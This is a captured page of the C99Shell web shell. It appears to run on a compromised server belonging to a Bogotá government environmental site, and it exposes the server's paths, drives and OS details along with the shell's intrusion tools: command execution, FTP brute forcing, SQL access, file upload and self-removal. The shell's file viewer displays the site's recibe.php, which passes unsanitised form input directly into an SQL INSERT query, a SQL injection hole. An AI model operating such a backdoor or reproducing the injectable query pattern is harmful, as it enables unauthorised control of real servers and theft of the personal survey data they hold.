!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

C:\AmbienteBogota\ambientebogota.gov.co\Tomemos_Conciencia\nuevopendiente\estudiantes\   drwxrwxrwx
Free 4.1 GB of 39.52 GB (10.37%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     recibe.php (2.06 KB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
require_once('conn/conexion.php'); 
if(isset(
$_POST['Submit2'])) {
  
$fecha $_POST['fecha'];
  
$genero $_POST['genero'];
  
$edad $_POST['edad'];
  
$estrato $_POST['estrato'];
  
$educacion $_POST['educacion'];
  
$autoridad $_POST['autoridad'];
  
$conoce $_POST['conoce'];
  
$impacto $_POST['impacto'];
  
$problema $_POST['problema'];
  
$medio $_POST['medio'];
  
$acciones =$_POST['acciones'];
  
$cuales $_POST['cuales'];
  
$tema $_POST['tema'];
  
$nombreimagen $_POST['nombreimagen'];
}

  
$name $_FILES['foto']['name'];
  
$type $_FILES['foto']['type'];
  
$tmp_name $_FILES['foto']['tmp_name'];
  
$size $_FILES['foto']['size'];
  
// Nivel de errores
  
error_reporting(E_ALL);
  
$mimetypes = array("image/jpeg""image/pjpeg""image/gif""image/png");
  
// Variables de la foto
  // Verificamos si el archivo es una imagen válida
  
if(!in_array($type$mimetypes))
    die(
"El archivo cargado no es una imagen válida");
  switch(
$type) {
    case 
$mimetypes[0]:
    case 
$mimetypes[1]:
      
$img imagecreatefromjpeg($tmp_name);
      break;
    case 
$mimetypes[2]:
      
$img imagecreatefromgif($tmp_name);
      break;
    case 
$mimetypes[3]:
      
$img imagecreatefrompng($tmp_name);
      break;
  }
  
// Extrae los contenidos de las fotos
  # contenido de la foto original
  
$fp fopen($tmp_name"rb");
  
$tfoto fread($fpfilesize($tmp_name));
  
$tfoto addslashes($tfoto);
  
fclose($fp);
  @
unlink($tmp_name);
  
$sql3 "INSERT INTO estudiantesT(
`id` ,
`fecha` ,
`genero` ,
`edad` ,
`estrato` ,
`educacion` ,
`autoridad` ,
`conoce` ,
`impacto` , `problema` , 
`medio` ,
`acciones` ,
`cuales` ,
`tema`,
`nombreimagen`,
`imagen`,
`mime`
)
VALUES (
NULL , '
$fecha', '$genero', '$edad', '$estrato', '$educacion', '$autoridad', '$conoce', '$impacto', '$problema', '$medio', '$acciones', '$cuales' , '$tema', '$nombreimagen', '$tfoto', '$type
)"
;

$resultado=mysql_query($sql3);

echo 
"Gracias por su participación, su acción ambiental fue inscrita satisfactoriamente";

?>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #13 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.0312 ]--